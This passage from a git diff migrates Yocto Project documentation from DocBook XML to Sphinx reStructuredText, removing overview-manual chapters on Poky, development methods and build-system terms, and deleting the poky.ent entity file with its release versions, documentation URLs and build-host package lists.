-                        <ulink url='https://openwrt.org/'>OpenWrt</ulink>
-                        projects, as well as the Yocto Project.
-                        <note>
-                            As best it can, opkg maintains backwards
-                            compatibility with ipkg and conforms to a subset
-                            of Debian’s policy manual regarding control files.
-                        </note>
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='gs-archived-components'>
-            <title>Archived Components</title>
-
-            <para>
-                The Build Appliance is a virtual machine image that enables
-                you to build and boot a custom embedded Linux image with
-                the Yocto Project using a non-Linux development system.
-            </para>
-
-            <para>
-                Historically, the Build Appliance was the second of three
-                methods by which you could use the Yocto Project on a system
-                that was not native to Linux.
-                <orderedlist>
-                    <listitem><para>
-                        <emphasis>Hob:</emphasis>
-                        Hob, which is now deprecated and is no longer available
-                        since the 2.1 release of the Yocto Project provided
-                        a rudimentary, GUI-based interface to the Yocto
-                        Project.
-                        Toaster has fully replaced Hob.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Build Appliance:</emphasis>
-                        Post Hob, the Build Appliance became available.
-                        It was never recommended that you use the Build
-                        Appliance as a day-to-day production development
-                        environment with the Yocto Project.
-                        Build Appliance was useful as a way to try out
-                        development in the Yocto Project environment.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>CROPS:</emphasis>
-                        The final and best solution available now for
-                        developing using the Yocto Project on a system
-                        not native to Linux is with
-                        <link linkend='gs-crops-overview'>CROPS</link>.
-                        </para></listitem>
-                </orderedlist>
-            </para>
-        </section>
-    </section>
-
-    <section id='gs-development-methods'>
-        <title>Development Methods</title>
-
-        <para>
-            The Yocto Project development environment usually involves a
-            <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>Build Host</ulink>
-            and target hardware.
-            You use the Build Host to build images and develop applications,
-            while you use the target hardware to test deployed software.
-        </para>
-
-        <para>
-            This section provides an introduction to the choices or
-            development methods you have when setting up your Build Host.
-            Depending on the your particular workflow preference and the
-            type of operating system your Build Host runs, several choices
-            exist that allow you to use the Yocto Project.
-            <note>
-                For additional detail about the Yocto Project development
-                environment, see the
-                "<link linkend='overview-development-environment'>The Yocto Project Development Environment</link>"
-                chapter.
-            </note>
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis>Native Linux Host:</emphasis>
-                    By far the best option for a Build Host.
-                    A system running Linux as its native operating system
-                    allows you to develop software by directly using the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink>
-                    tool.
-                    You can accomplish all aspects of development from a
-                    familiar shell of a supported Linux distribution.</para>
-
-                    <para>For information on how to set up a Build Host on
-                    a system running Linux as its native operating system,
-                    see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#setting-up-a-native-linux-host'>Setting Up a Native Linux Host</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>CROss PlatformS (CROPS):</emphasis>
-                    Typically, you use
-                    <ulink url='https://github.com/crops/poky-container/'>CROPS</ulink>,
-                    which leverages
-                    <ulink url='https://www.docker.com/'>Docker Containers</ulink>,
-                    to set up a Build Host that is not running Linux (e.g.
-                    <trademark class='registered'>Microsoft</trademark>
-                    <trademark class='trademark'>Windows</trademark>
-                    or
-                    <trademark class='registered'>macOS</trademark>).
-                    <note>
-                        You can, however, use CROPS on a Linux-based system.
-                    </note>
-                    CROPS is an open source, cross-platform development
-                    framework that provides an easily managed, extensible
-                    environment for building binaries targeted for a variety
-                    of architectures on Windows, macOS, or Linux hosts.
-                    Once the Build Host is set up using CROPS, you can prepare
-                    a shell environment to mimic that of a shell being used
-                    on a system natively running Linux.</para>
-
-                    <para>For information on how to set up a Build Host with
-                    CROPS, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#setting-up-to-use-crops'>Setting Up to Use CROss PlatformS (CROPS)</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Windows Subsystem For Linux (WSLv2):</emphasis>
-                    You may use Windows Subsystem For Linux v2 to set up a build
-                    host using Windows 10.
-                    <note>
-                      The Yocto Project is not compatible with WSLv1, it is
-                      compatible but not officially supported nor validated
-                      with WSLv2, if you still decide to use WSL please upgrade
-                      to WSLv2.
-                    </note>
-                    The Windows Subsystem For Linux allows Windows 10 to run a real
-                    Linux kernel inside of a lightweight utility virtual
-                    machine (VM) using virtualization technology.</para>
-                    <para>For information on how to set up a Build Host with
-                    WSLv2, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#setting-up-to-use-wsl'>Setting Up to Use Windows Subsystem For Linux</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Toaster:</emphasis>
-                    Regardless of what your Build Host is running, you can
-                    use Toaster to develop software using the Yocto Project.
-                    Toaster is a web interface to the Yocto Project's
-                    <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>Open-Embedded build system</ulink>.
-                    The interface enables you to configure and run your
-                    builds.
-                    Information about builds is collected and stored in a
-                    database.
-                    You can use Toaster to configure and start builds on
-                    multiple remote build servers.</para>
-
-                    <para>For information about and how to use Toaster,
-                    see the
-                    <ulink url='&YOCTO_DOCS_TOAST_URL;'>Toaster User Manual</ulink>.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='reference-embedded-distribution'>
-        <title>Reference Embedded Distribution (Poky)</title>
-
-        <para>
-            "Poky", which is pronounced <emphasis>Pock</emphasis>-ee, is the
-            name of the Yocto Project's reference distribution or Reference OS
-            Kit.
-            Poky contains the
-            <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded Build System</ulink>
-            (<ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink> and
-            <ulink url='&YOCTO_DOCS_REF_URL;#oe-core'>OpenEmbedded-Core</ulink>)
-            as well as a set of
-            <ulink url='&YOCTO_DOCS_REF_URL;#metadata'>metadata</ulink> to get
-            you started building your own distro.
-            In other words, Poky is a base specification of the functionality
-            needed for a typical embedded system as well as the components
-            from the Yocto Project that allow you to build a distribution into
-            a usable binary image.
-        </para>
-
-        <para>
-            Poky is a combined repository of BitBake, OpenEmbedded-Core
-            (which is found in <filename>meta</filename>),
-            <filename>meta-poky</filename>,
-            <filename>meta-yocto-bsp</filename>, and documentation provided
-            all together and known to work well together.
-            You can view these items that make up the Poky repository in the
-            <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/'>Source Repositories</ulink>.
-            <note>
-                If you are interested in all the contents of the
-                <filename>poky</filename> Git repository, see the
-                "<ulink url='&YOCTO_DOCS_REF_URL;#structure-core'>Top-Level Core Components</ulink>"
-                section in the Yocto Project Reference Manual.
-            </note>
-        </para>
-
-        <para id='gs-poky-reference-distribution'>
-            The following figure illustrates what generally comprises Poky:
-            <imagedata fileref="figures/poky-reference-distribution.png" format="PNG" align='center' width="8in"/>
-            <itemizedlist>
-                <listitem><para>
-                    BitBake is a task executor and scheduler that is the heart of
-                    the OpenEmbedded build system.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>meta-poky</filename>, which is Poky-specific
-                    metadata.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>meta-yocto-bsp</filename>, which are Yocto
-                    Project-specific Board Support Packages (BSPs).
-                    </para></listitem>
-                <listitem><para>
-                    OpenEmbedded-Core (OE-Core) metadata, which includes
-                    shared configurations, global variable definitions,
-                    shared classes, packaging, and recipes.
-                    Classes define the encapsulation and inheritance of build
-                    logic.
-                    Recipes are the logical units of software and images
-                    to be built.
-                    </para></listitem>
-                <listitem><para>
-                    Documentation, which contains the Yocto Project source
-                    files used to make the set of user manuals.
-                    </para></listitem>
-            </itemizedlist>
-            <note>
-                While Poky is a "complete" distribution specification and is
-                tested and put through QA, you cannot use it as a product
-                "out of the box" in its current form.
-            </note>
-        </para>
-
-        <para>
-            To use the Yocto Project tools, you can use Git to clone (download)
-            the Poky repository then use your local copy of the reference
-            distribution to bootstrap your own distribution.
-            <note>
-                Poky does not contain binary files.
-                It is a working example of how to build your own custom Linux distribution
-                from source.
-            </note>
-        </para>
-
-        <para>
-            Poky has a regular, well established, six-month release cycle
-            under its own version.
-            Major releases occur at the same time major releases (point
-            releases) occur for the Yocto Project, which are typically in the
-            Spring and Fall.
-            For more information on the Yocto Project release schedule and
-            cadence, see the
-            "<ulink url='&YOCTO_DOCS_REF_URL;#ref-release-process'>Yocto Project Releases and the Stable Release Process</ulink>"
-            chapter in the Yocto Project Reference Manual.
-        </para>
-
-        <para>
-            Much has been said about Poky being a "default configuration."
-            A default configuration provides a starting image footprint.
-            You can use Poky out of the box to create an image ranging from a
-            shell-accessible minimal image all the way up to a Linux
-            Standard Base-compliant image that uses a GNOME Mobile and
-            Embedded (GMAE) based reference user interface called Sato.
-        </para>
-
-        <para>
-            One of the most powerful properties of Poky is that every aspect
-            of a build is controlled by the metadata.
-            You can use metadata to augment these base image types by
-            adding metadata
-            <link linkend='the-yocto-project-layer-model'>layers</link>
-            that extend functionality.
-            These layers can provide, for example, an additional software
-            stack for an image type, add a board support package (BSP) for
-            additional hardware, or even create a new image type.
-        </para>
-
-        <para>
-            Metadata is loosely grouped into configuration files or package
-            recipes.
-            A recipe is a collection of non-executable metadata used by
-            BitBake to set variables or define additional build-time tasks.
-            A recipe contains fields such as the recipe description, the recipe
-            version, the license of the package and the upstream source
-            repository.
-            A recipe might also indicate that the build process uses autotools,
-            make, distutils or any other build process, in which case the basic
-            functionality can be defined by the classes it inherits from
-            the OE-Core layer's class definitions in
-            <filename>./meta/classes</filename>.
-            Within a recipe you can also define additional tasks as well as
-            task prerequisites.
-            Recipe syntax through BitBake also supports both
-            <filename>_prepend</filename> and <filename>_append</filename>
-            operators as a method of extending task functionality.
-            These operators inject code into the beginning or end of a task.
-            For information on these BitBake operators, see the
-            "<ulink url='&YOCTO_DOCS_BB_URL;#appending-and-prepending-override-style-syntax'>Appending and Prepending (Override Style Syntax)</ulink>"
-            section in the BitBake User's Manual.
-        </para>
-    </section>
-
-    <section id='openembedded-build-system-workflow'>
-        <title>The OpenEmbedded Build System Workflow</title>
-
-        <para>
-            The
-            <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>
-            uses a "workflow" to accomplish image and SDK generation.
-            The following figure overviews that workflow:
-            <imagedata fileref="figures/YP-flow-diagram.png"
-                format="PNG" align='center' width="8in"/>
-            Following is a brief summary of the "workflow":
-            <orderedlist>
-                <listitem><para>
-                    Developers specify architecture, policies, patches and
-                    configuration details.
-                    </para></listitem>
-                <listitem><para>
-                    The build system fetches and downloads the source code
-                    from the specified location.
-                    The build system supports standard methods such as tarballs
-                    or source code repositories systems such as Git.
-                    </para></listitem>
-                <listitem><para>
-                    Once source code is downloaded, the build system extracts
-                    the sources into a local work area where patches are
-                    applied and common steps for configuring and compiling
-                    the software are run.
-                    </para></listitem>
-                <listitem><para>
-                    The build system then installs the software into a
-                    temporary staging area where the binary package format you
-                    select (DEB, RPM, or IPK) is used to roll up the software.
-                    </para></listitem>
-                <listitem><para>
-                    Different QA and sanity checks run throughout entire
-                    build process.
-                    </para></listitem>
-                <listitem><para>
-                    After the binaries are created, the build system
-                    generates a binary package feed that is used to create
-                    the final root file image.
-                    </para></listitem>
-                <listitem><para>
-                    The build system generates the file system image and a
-                    customized Extensible SDK (eSDK) for application
-                    development in parallel.
-                    </para></listitem>
-            </orderedlist>
-        </para>
-
-        <para>
-            For a very detailed look at this workflow, see the
-            "<link linkend='openembedded-build-system-build-concepts'>OpenEmbedded Build System Concepts</link>"
-            section.
-        </para>
-    </section>
-
-
-    <section id='some-basic-terms'>
-        <title>Some Basic Terms</title>
-
-        <para>
-            It helps to understand some basic fundamental terms when
-            learning the Yocto Project.
-            Although a list of terms exists in the
-            "<ulink url='&YOCTO_DOCS_REF_URL;#ref-terms'>Yocto Project Terms</ulink>"
-            section of the Yocto Project Reference Manual, this section
-            provides the definitions of some terms helpful for getting started:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis>Configuration Files:</emphasis>
-                    Files that hold global definitions of variables,
-                    user-defined variables, and hardware configuration
-                    information.
-                    These files tell the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>Open-Embedded build system</ulink>
-                    what to build and what to put into the image to support a
-                    particular platform.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Extensible Software Development Kit (eSDK):</emphasis>
-                    A custom SDK for application developers.
-                    This eSDK allows developers to incorporate their library
-                    and programming changes back into the image to make
-                    their code available to other application developers.
-                    For information on the eSDK, see the
-                    <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
-                    manual.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Layer:</emphasis>
-                    A collection of related recipes.
-                    Layers allow you to consolidate related metadata to
-                    customize your build.
-                    Layers also isolate information used when building
-                    for multiple architectures.
-                    Layers are hierarchical in their ability to override
-                    previous specifications.
-                    You can include any number of available layers from the
-                    Yocto Project and customize the build by adding your
-                    layers after them.
-                    You can search the Layer Index for layers used within
-                    Yocto Project.</para>
-
-                    <para>For more detailed information on layers, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                    For a discussion specifically on BSP Layers, see the
-                    "<ulink url='&YOCTO_DOCS_BSP_URL;#bsp-layers'>BSP Layers</ulink>"
-                    section in the Yocto Project Board Support Packages (BSP)
-                    Developer's Guide.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Metadata:</emphasis>
-                    A key element of the Yocto Project is the Metadata that
-                    is used to construct a Linux distribution and is contained
-                    in the files that the OpenEmbedded build system parses
-                    when building an image.
-                    In general, Metadata includes recipes, configuration
-                    files, and other information that refers to the build
-                    instructions themselves, as well as the data used to
-                    control what things get built and the effects of the
-                    build.
-                    Metadata also includes commands and data used to
-                    indicate what versions of software are used, from
-                    where they are obtained, and changes or additions to the
-                    software itself (patches or auxiliary files) that
-                    are used to fix bugs or customize the software for use
-                    in a particular situation.
-                    OpenEmbedded-Core is an important set of validated
-                    metadata.
-                    </para></listitem>
-                <listitem><para id='gs-term-openembedded-build-system'>
-                    <emphasis>OpenEmbedded Build System:</emphasis>
-                    The terms "BitBake" and "build system" are sometimes
-                    used for the OpenEmbedded Build System.</para>
-
-                    <para>BitBake is a task scheduler and execution engine
-                    that parses instructions (i.e. recipes) and configuration
-                    data.
-                    After a parsing phase, BitBake creates a dependency tree
-                    to order the compilation, schedules the compilation of
-                    the included code, and finally executes the building
-                    of the specified custom Linux image (distribution).
-                    BitBake is similar to the <filename>make</filename>
-                    tool.</para>
-
-                    <para>During a build process, the build system tracks
-                    dependencies and performs a native or cross-compilation
-                    of the package.
-                    As a first step in a cross-build setup, the framework
-                    attempts to create a cross-compiler toolchain
-                    (i.e. Extensible SDK) suited for the target platform.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>OpenEmbedded-Core (OE-Core):</emphasis>
-                    OE-Core is metadata comprised of foundation recipes,
-                    classes, and associated files that are meant to be
-                    common among many different OpenEmbedded-derived systems,
-                    including the Yocto Project.
-                    OE-Core is a curated subset of an original repository
-                    developed by the OpenEmbedded community that has been
-                    pared down into a smaller, core set of continuously
-                    validated recipes.
-                    The result is a tightly controlled and quality-assured
-                    core set of recipes.</para>
-
-                    <para>You can see the Metadata in the
-                    <filename>meta</filename> directory of the Yocto Project
-                    <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi'>Source Repositories</ulink>.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Packages:</emphasis>
-                    In the context of the Yocto Project, this term refers to a
-                    recipe's packaged output produced by BitBake (i.e. a
-                    "baked recipe").
-                    A package is generally the compiled binaries produced from the
-                    recipe's sources.
-                    You "bake" something by running it through BitBake.</para>
-
-                    <para>It is worth noting that the term "package" can,
-                    in general, have subtle meanings.
-                    For example, the packages referred to in the
-                    "<ulink url='&YOCTO_DOCS_REF_URL;#required-packages-for-the-build-host'>Required Packages for the Build Host</ulink>"
-                    section in the Yocto Project Reference Manual are compiled
-                    binaries that, when installed, add functionality to your
-                    Linux distribution.</para>
-
-                    <para>Another point worth noting is that historically within
-                    the Yocto Project, recipes were referred to as packages - thus,
-                    the existence of several BitBake variables that are seemingly
-                    mis-named,
-                    (e.g. <ulink url='&YOCTO_DOCS_REF_URL;#var-PR'><filename>PR</filename></ulink>,
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>,
-                    and
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PE'><filename>PE</filename></ulink>).
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Poky:</emphasis>
-                    Poky is a reference embedded distribution and a reference
-                    test configuration.
-                    Poky provides the following:
-                    <itemizedlist>
-                        <listitem><para>
-                            A base-level functional distro used to illustrate
-                            how to customize a distribution.
-                            </para></listitem>
-                        <listitem><para>
-                            A means by which to test the Yocto Project
-                            components (i.e. Poky is used to validate
-                            the Yocto Project).
-                            </para></listitem>
-                        <listitem><para>
-                            A vehicle through which you can download
-                            the Yocto Project.
-                            </para></listitem>
-                    </itemizedlist>
-                    Poky is not a product level distro.
-                    Rather, it is a good starting point for customization.
-                    <note>
-                        Poky is an integration layer on top of OE-Core.
-                    </note>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Recipe:</emphasis>
-                    The most common form of metadata.
-                    A recipe contains a list of settings and tasks
-                    (i.e. instructions) for building packages that are then
-                    used to build the binary image.
-                    A recipe describes where you get source code and which
-                    patches to apply.
-                    Recipes describe dependencies for libraries or for other
-                    recipes as well as configuration and compilation options.
-                    Related recipes are consolidated into a layer.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/overview-manual/overview-manual.rst b/documentation/overview-manual/overview-manual.rst
new file mode 100644
index 0000000000..f20b20e328
--- /dev/null
+++ b/documentation/overview-manual/overview-manual.rst
@@ -0,0 +1,19 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+==========================================
+Yocto Project Overview and Concepts Manual
+==========================================
+
+|
+
+.. toctree::
+   :caption: Table of Contents
+   :numbered:
+
+   overview-manual-intro
+   overview-manual-yp-intro
+   overview-manual-development-environment
+   overview-manual-concepts
+   history
+
+.. include:: /boilerplate.rst
diff --git a/documentation/overview-manual/overview-manual.xml b/documentation/overview-manual/overview-manual.xml
deleted file mode 100755
index 7c75e5086c..0000000000
--- a/documentation/overview-manual/overview-manual.xml
+++ /dev/null
@@ -1,149 +0,0 @@
-<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<book id='overview-manual' lang='en'
-      xmlns:xi="http://www.w3.org/2003/XInclude"
-      xmlns="http://docbook.org/ns/docbook"
-      >
-    <bookinfo>
-
-        <mediaobject>
-            <imageobject>
-                <imagedata fileref='figures/overview-manual-title.png'
-                    format='SVG'
-                    align='left' scalefit='1' width='100%'/>
-            </imageobject>
-        </mediaobject>
-
-        <title>
-            Yocto Project Overview and Concepts Manual
-        </title>
-
-        <authorgroup>
-            <author>
-                <affiliation>
-                    <orgname>&ORGNAME;</orgname>
-                </affiliation>
-                <email>&ORGEMAIL;</email>
-            </author>
-        </authorgroup>
-
-        <revhistory>
-            <revision>
-                <revnumber>2.5</revnumber>
-                <date>May 2018</date>
-                <revremark>The initial document released with the Yocto Project 2.5 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.6</revnumber>
-                <date>November 2018</date>
-                <revremark>Released with the Yocto Project 2.6 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.7</revnumber>
-                <date>May 2019</date>
-                <revremark>Released with the Yocto Project 2.7 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.0</revnumber>
-                <date>October 2019</date>
-                <revremark>Released with the Yocto Project 3.0 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1</revnumber>
-                <date>April 2020</date>
-                <revremark>Released with the Yocto Project 3.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.1</revnumber>
-                <date>June 2020</date>
-                <revremark>Released with the Yocto Project 3.1.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.2</revnumber>
-                <date>August 2020</date>
-                <revremark>Released with the Yocto Project 3.1.2 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.3</revnumber>
-                <date>October 2020</date>
-                <revremark>Released with the Yocto Project 3.1.3 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.4</revnumber>
-                <date>&REL_MONTH_YEAR;</date>
-                <revremark>Released with the Yocto Project 3.1.4 Release.</revremark>
-            </revision>
-        </revhistory>
-
-    <copyright>
-     <year>&COPYRIGHT_YEAR;</year>
-      <holder>Linux Foundation</holder>
-    </copyright>
-
-    <legalnotice>
-      <para>
-          Permission is granted to copy, distribute and/or modify this document under
-          the terms of the <ulink type="http" url="http://creativecommons.org/licenses/by-sa/2.0/uk/">
-          Creative Commons Attribution-Share Alike 2.0 UK: England &amp; Wales</ulink> as published by
-          Creative Commons.
-      </para>
-           <note><title>Manual Notes</title>
-               <itemizedlist>
-                   <listitem><para>
-                       This version of the
-                       <emphasis>Yocto Project Overview and Concepts Manual</emphasis>
-                       is for the &YOCTO_DOC_VERSION; release of the
-                       Yocto Project.
-                       To be sure you have the latest version of the manual
-                       for this release, go to the
-                       <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
-                       and select the manual from that site.
-                       Manuals from the site are more up-to-date than manuals
-                       derived from the Yocto Project released TAR files.
-                       </para></listitem>
-                   <listitem><para>
-                       If you located this manual through a web search, the
-                       version of the manual might not be the one you want
-                       (e.g. the search might have returned a manual much
-                       older than the Yocto Project version with which you
-                       are working).
-                       You can see all Yocto Project major releases by
-                       visiting the
-                       <ulink url='&YOCTO_WIKI_URL;/wiki/Releases'>Releases</ulink>
-                       page.
-                       If you need a version of this manual for a different
-                       Yocto Project release, visit the
-                       <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
-                       and select the manual set by using the
-                       "ACTIVE RELEASES DOCUMENTATION" or "DOCUMENTS ARCHIVE"
-                       pull-down menus.
-                       </para></listitem>
-                   <listitem>
-                       <para>
-                       To report any inaccuracies or problems with this
-                       (or any other Yocto Project) manual, send an email to
-                       the Yocto Project documentation mailing list at
-                       <filename>docs@lists.yoctoproject.org</filename> or
-                       log into the freenode <filename>#yocto</filename> channel.
-                       </para>
-                   </listitem>
-               </itemizedlist>
-           </note>
-    </legalnotice>
-
-    </bookinfo>
-
-    <xi:include href="overview-manual-intro.xml"/>
-
-    <xi:include href="overview-manual-yp-intro.xml"/>
-
-    <xi:include href="overview-manual-development-environment.xml"/>
-
-    <xi:include href="overview-manual-concepts.xml" />
-
-</book>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/poky.ent b/documentation/poky.ent
deleted file mode 100755
index 7c00d3a41b..0000000000
--- a/documentation/poky.ent
+++ /dev/null
@@ -1,89 +0,0 @@
-<!ENTITY DISTRO "3.1.4">
-<!ENTITY DISTRO_COMPRESSED "314">
-<!ENTITY DISTRO_NAME_NO_CAP "dunfell">
-<!ENTITY DISTRO_NAME "Dunfell">
-<!ENTITY DISTRO_NAME_NO_CAP_MINUS_ONE "zeus">
-<!ENTITY DISTRO_NAME_MINUS_ONE "Zeus">
-<!ENTITY YOCTO_DOC_VERSION "3.1.4">
-<!ENTITY YOCTO_DOC_VERSION_MINUS_ONE "3.0.2">
-<!ENTITY DISTRO_REL_TAG "yocto-3.1.4">
-<!ENTITY METAINTELVERSION "12.0">
-<!ENTITY REL_MONTH_YEAR "November 2020">
-<!ENTITY META_INTEL_REL_TAG "&METAINTELVERSION;-&DISTRO_NAME_NO_CAP;-&YOCTO_DOC_VERSION;">
-<!ENTITY POKYVERSION "23.0.4">
-<!ENTITY POKYVERSION_COMPRESSED "2304">
-<!ENTITY YOCTO_POKY "poky-&DISTRO_NAME_NO_CAP;-&POKYVERSION;">
-<!ENTITY COPYRIGHT_YEAR "2010-2020">
-<!ENTITY ORGNAME "The Yocto Project">
-<!ENTITY ORGEMAIL "docs@lists.yoctoproject.org">
-<!ENTITY YOCTO_DL_URL "http://downloads.yoctoproject.org">
-<!ENTITY YOCTO_HOME_URL "http://www.yoctoproject.org">
-<!ENTITY YOCTO_LISTS_URL "http://lists.yoctoproject.org">
-<!ENTITY YOCTO_BUGZILLA_URL "http://bugzilla.yoctoproject.org">
-<!ENTITY YOCTO_WIKI_URL "https://wiki.yoctoproject.org">
-<!ENTITY YOCTO_AB_URL "http://autobuilder.yoctoproject.org">
-<!ENTITY YOCTO_GIT_URL "http://git.yoctoproject.org">
-<!ENTITY YOCTO_ADTREPO_URL "http://adtrepo.yoctoproject.org">
-<!ENTITY OE_HOME_URL "http://www.openembedded.org">
-<!ENTITY OE_LISTS_URL "http://lists.openembedded.org/mailman">
-<!ENTITY OE_DOCS_URL "http://docs.openembedded.org">
-<!ENTITY OH_HOME_URL "http://o-hand.com">
-<!ENTITY BITBAKE_HOME_URL "http://developer.berlios.de/projects/bitbake/">
-<!ENTITY YOCTO_DOCS_URL "&YOCTO_HOME_URL;/docs">
-<!ENTITY YOCTO_SOURCES_URL "&YOCTO_HOME_URL;/sources/">
-<!ENTITY YOCTO_AB_PORT_URL "https://autobuilder.yocto.io/">
-<!ENTITY YOCTO_AB_NIGHTLY_URL "&YOCTO_AB_PORT_URL;/pub/nightly/">
-<!ENTITY YOCTO_POKY_URL "&YOCTO_DL_URL;/releases/poky/">
-<!ENTITY YOCTO_RELEASE_DL_URL "&YOCTO_DL_URL;/releases/yocto/yocto-&DISTRO;">
-<!ENTITY YOCTO_TOOLCHAIN_DL_URL "&YOCTO_RELEASE_DL_URL;/toolchain/">
-<!ENTITY YOCTO_ADTINSTALLER_DL_URL "&YOCTO_RELEASE_DL_URL;/adt-installer">
-<!ENTITY YOCTO_POKY_DL_URL "&YOCTO_RELEASE_DL_URL;/&YOCTO_POKY;.tar.bz2">
-<!ENTITY YOCTO_MACHINES_DL_URL "&YOCTO_RELEASE_DL_URL;/machines">
-<!ENTITY YOCTO_QEMU_DL_URL "&YOCTO_MACHINES_DL_URL;/qemu">
-<!ENTITY YOCTO_PYTHON-i686_DL_URL "&YOCTO_DL_URL;/releases/miscsupport/python-nativesdk-standalone-i686.tar.bz2">
-<!ENTITY YOCTO_PYTHON-x86_64_DL_URL "&YOCTO_DL_URL;/releases/miscsupport/python-nativesdk-standalone-x86_64.tar.bz2">
-<!ENTITY YOCTO_DOCS_QS_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/yocto-project-qs/yocto-project-qs.html">
-<!ENTITY YOCTO_DOCS_ADT_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/adt-manual/adt-manual.html">
-<!ENTITY YOCTO_DOCS_REF_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/ref-manual/ref-manual.html">
-<!ENTITY YOCTO_DOCS_BSP_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/bsp-guide/bsp-guide.html">
-<!ENTITY YOCTO_DOCS_DEV_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/dev-manual/dev-manual.html">
-<!ENTITY YOCTO_DOCS_KERNEL_DEV_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/kernel-dev/kernel-dev.html">
-<!ENTITY YOCTO_DOCS_PROF_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/profile-manual/profile-manual.html">
-<!ENTITY YOCTO_DOCS_MM_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/mega-manual/mega-manual.html">
-<!ENTITY YOCTO_DOCS_BB_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/bitbake-user-manual/bitbake-user-manual.html">
-<!ENTITY YOCTO_DOCS_TOAST_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/toaster-manual/toaster-manual.html">
-<!ENTITY YOCTO_DOCS_SDK_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/sdk-manual/sdk-manual.html">
-<!ENTITY YOCTO_DOCS_OM_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/overview-manual/overview-manual.html">
-<!ENTITY YOCTO_DOCS_BRIEF_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/brief-yoctoprojectqs/brief-yoctoprojectqs.html">
-<!ENTITY YOCTO_ADTPATH_DIR "/opt/poky/&DISTRO;">
-<!ENTITY YOCTO_POKY_TARBALL "&YOCTO_POKY;.tar.bz2">
-<!ENTITY OE_INIT_PATH "&YOCTO_POKY;/oe-init-build-env">
-<!ENTITY OE_INIT_FILE "oe-init-build-env">
-<!ENTITY UBUNTU_HOST_PACKAGES_ESSENTIAL "gawk wget git-core diffstat unzip texinfo gcc-multilib \
-     build-essential chrpath socat cpio python3 python3-pip python3-pexpect \
-     xz-utils debianutils iputils-ping python3-git python3-jinja2 libegl1-mesa libsdl1.2-dev \
-     pylint3 xterm">
-<!ENTITY FEDORA_HOST_PACKAGES_ESSENTIAL "gawk make wget tar bzip2 gzip python3 unzip perl patch \
-     diffutils diffstat git cpp gcc gcc-c++ glibc-devel texinfo chrpath \
